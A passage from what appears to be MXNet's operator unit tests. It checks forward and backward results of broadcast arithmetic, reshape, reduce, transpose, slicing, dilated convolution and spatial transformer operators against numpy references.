check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 3D
for dil in [ (1,1,1), (2,2,2), (3,3,3) ]:
for ks in [ (3,3,3), (4,4,4), (2,3,4), (3,2,4), (1,1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
assert_allclose(exe.grad_arrays[0].asnumpy(), out_grad_npy.reshape((5, 4, 3, 7)))
@with_seed()
def test_reshape_like():
def test_reshape_like_new(lhs_shape, rhs_shape, lbeg, lend, rbeg, rend, dst_shape):
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs, lhs_begin=lbeg, lhs_end=lend, rhs_begin=rbeg, rhs_end=rend)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=lhs_shape, rhs=rhs_shape)
assert output_shape[0] == dst_shape, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
lhs_npy = np.random.rand(*lhs_shape)
rhs_npy = np.random.rand(*rhs_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), lhs=lhs_shape, rhs=rhs_shape)
exe.arg_dict['lhs'][:] = lhs_npy
exe.arg_dict['rhs'][:] = rhs_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - lhs_npy.reshape(dst_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['lhs'].asnumpy() - grad_npy.reshape(lhs_shape)).mean() < 1E-7, \
'LHS Shape = %s, RHS Shape = %s, lhs_begin = %s, lhs_end = %s, rhs_begin= %s, rhs_end= %s'\
%(str(lhs_shape), str(rhs_shape), str(lbeg), str(lend), str(rbeg), str(rend))
# Test new api (Using shape)
test_cases = [
[(30,), (15,2,4), 0, None, 0, 2, (15,2)],
[(30,), (15,2,4), None, 1, None, 2, (15,2)],
[(30,7), (15,2,4), 0, 1, 0, 2, (15,2,7)],
[(3,5), (1,15,4), 0, 2, 1, 2, (15,)],
[(3,5), (1,15,4), 0, None, 1, -1, (15,)],
[(30,12), (4,2,2,3), -1, None, 1, None, (30,2,2,3)],
[(1,1,7,3,1,1), (81,1,1,21), 1, -1, 1, None, (1,1,1,21,1)]
]
# for test_case in test_cases:
for test_case in test_cases:
test_reshape_like_new(*test_case)
# Test old api
lhs = mx.sym.Variable("lhs")
rhs = mx.sym.Variable("rhs")
net = mx.sym.reshape_like(lhs, rhs)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(lhs=(40, 30), rhs=(30,20,2))
assert(output_shape[0] == (30,20,2))
@with_seed()
def test_reduce():
sample_num = 500
def test_reduce_inner(numpy_reduce_func, numpy_reduce_grad_func, mx_reduce_sym, nan_prob=0,
test_exclude=True, test_none_axis=False):
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
# Insert a NaN with probability equal to nan_prob
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
axis_num = np.random.randint(0, ndim, size=1)
axis_flags = np.random.randint(0, 2, size=ndim)
if test_exclude:
exclude = np.random.randint(0, 2)
else:
exclude = False
axes = []
for (axis, flag) in enumerate(axis_flags):
if flag:
axes.append(axis)
if 0 == len(axes):
axes = None
elif 1 == len(axes):
axes = axes[0]
else:
axes = tuple(axes)
keepdims = np.random.randint(0, 2)
a = mx.symbol.Variable('a')
if axes is None:
if test_none_axis:
b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
